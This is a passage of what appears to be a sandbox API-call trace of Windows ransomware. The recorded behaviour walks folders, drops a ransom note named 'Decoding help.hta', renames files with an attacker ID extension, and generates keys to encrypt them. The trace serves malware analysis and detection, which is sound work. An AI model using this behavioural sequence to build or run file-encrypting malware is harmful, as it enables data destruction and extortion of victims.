ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5730 [0054.854] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.854] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x2bb6fd30 | out: lpFindFileData=0x2bb6fd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.855] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.855] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.855] FindNextFileW (in: hFindFile=0x5a5730, lpFindFileData=0x2bb6fd30 | out: lpFindFileData=0x2bb6fd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0054.855] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0054.855] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned 44 [0054.855] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Decoding help.hta" [0054.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Decoding help.hta" (normalized: "c:\\users\\public\\videos\\sample videos\\decoding help.hta")) returned 0xffffffff [0054.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Decoding help.hta" (normalized: "c:\\users\\public\\videos\\sample videos\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0054.855] WriteFile (in: hFile=0x708, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2bb6fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2bb6fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.557] CloseHandle (hObject=0x708) returned 1 [0056.947] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.487] lstrcmpiW (lpString1="Decoding help.hta", lpString2="desktop.ini") returned -1 [0058.487] lstrlenW (lpString="desktop.ini") returned 11 [0058.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*" [0058.487] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*.*") returned 44 [0058.487] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\", lpString2="desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" [0058.487] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" [0058.488] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0058.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0058.491] CreateFileMappingA (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc84 [0058.491] CryptAcquireContextA (in: phProv=0x2bb6fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2bb6fcec*=0x2aac6a18) returned 1 [0060.225] CryptGenKey (in: hProv=0x2aac6a18, Algid=0x6610, dwFlags=0x1, phKey=0x2bb6fce8 | out: phKey=0x2bb6fce8*=0x10f143c0) returned 1 [0060.225] CryptExportKey (in: hKey=0x10f143c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2bb6fbe4, pdwDataLen=0x2bb6fce4 | out: pbData=0x2bb6fbe4*, pdwDataLen=0x2bb6fce4*=0x2c) returned 1 [0060.225] MapViewOfFile (hFileMappingObject=0xc84, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x7b40000 Thread: id = 885 os_tid = 0xb24 [0054.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x2bcafd30 | out: lpFindFileData=0x2bcafd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0056.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.144] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x2bcafd30 | out: lpFindFileData=0x2bcafd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.144] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.145] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x2bcafd30 | out: lpFindFileData=0x2bcafd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0056.596] lstrcpyW (in: lpString1=0x2aa70f08, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" [0056.596] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned 48 [0056.596] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Decoding help.hta" [0056.596] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Decoding help.hta" (normalized: "c:\\users\\public\\pictures\\sample pictures\\decoding help.hta")) returned 0xffffffff [0056.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Decoding help.hta" (normalized: "c:\\users\\public\\pictures\\sample pictures\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0059.198] WriteFile (in: hFile=0x5a4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2bcafcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2bcafcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.490] CloseHandle (hObject=0x5a4) returned 1 [0061.591] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Decoding help.hta", dwFileAttributes=0x1) returned 1 Thread: id = 886 os_tid = 0x788 [0054.881] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*", lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5db0 [0056.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.145] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.145] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.145] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.145] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbae7f0e8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbae7f0e8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb0ffddc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd86, dwReserved0=0x0, dwReserved1=0x0, cFileName="blank.png", cAlternateFileName="")) returned 1 [0056.602] lstrcpyW (in: lpString1=0x2aa78f10, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0056.602] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0056.602] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0056.602] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0xffffffff [0056.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa10 [0058.050] WriteFile (in: hFile=0xa10, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2bdefcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2bdefcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.051] CloseHandle (hObject=0xa10) returned 1 [0058.051] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.051] lstrcmpiW (lpString1="Decoding help.hta", lpString2="blank.png") returned 1 [0058.051] lstrlenW (lpString="blank.png") returned 9 [0058.051] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0058.051] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0058.051] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="blank.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" [0058.051] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" [0058.051] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.051] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\blank.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\blank.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.044] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x819454bf, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x819454bf, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="in_sidebar", cAlternateFileName="IN_SID~1")) returned 1 [0059.044] lstrcmpW (lpString1=".", lpString2="in_sidebar") returned -1 [0059.044] lstrcmpW (lpString1="..", lpString2="in_sidebar") returned -1 [0059.044] lstrcmpiW (lpString1="windows", lpString2="in_sidebar") returned 1 [0059.044] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.044] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.044] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="in_sidebar" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar" [0059.044] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\in_sidebar\\*.*" [0059.044] GlobalMemoryStatus (in: lpBuffer=0x2bdefd10 | out: lpBuffer=0x2bdefd10) [0059.044] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24f671b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xd6c [0059.045] CloseHandle (hObject=0xd6c) returned 1 [0059.045] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb14c09c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0xcb14c09c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0xcb14c09c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbf7, dwReserved0=0x0, dwReserved1=0x0, cFileName="next_down.png", cAlternateFileName="")) returned 1 [0059.045] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.045] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.045] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.045] lstrcmpiW (lpString1="Decoding help.hta", lpString2="next_down.png") returned -1 [0059.045] lstrlenW (lpString="next_down.png") returned 13 [0059.045] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.045] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.046] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="next_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" [0059.046] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" [0059.046] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_down.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\next_down.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.046] FindNextFileW (in: hFindFile=0x5a5db0, lpFindFileData=0x2bdefd30 | out: lpFindFileData=0x2bdefd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad9a8ae, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xbad9a8ae, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xcb14c09c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xbf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="next_hov.png", cAlternateFileName="")) returned 1 [0059.046] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.046] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.046] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" [0059.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\slideshow.gadget\\images\\decoding help.hta")) returned 0x1 [0059.047] lstrcmpiW (lpString1="Decoding help.hta", lpString2="next_hov.png") returned -1 [0059.047] lstrlenW (lpString="next_hov.png") returned 12 [0059.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*" [0059.047] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\*.*") returned 78 [0059.047] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\", lpString2="next_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" [0059.047] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png" [0059.047] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\images\\next_hov.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files 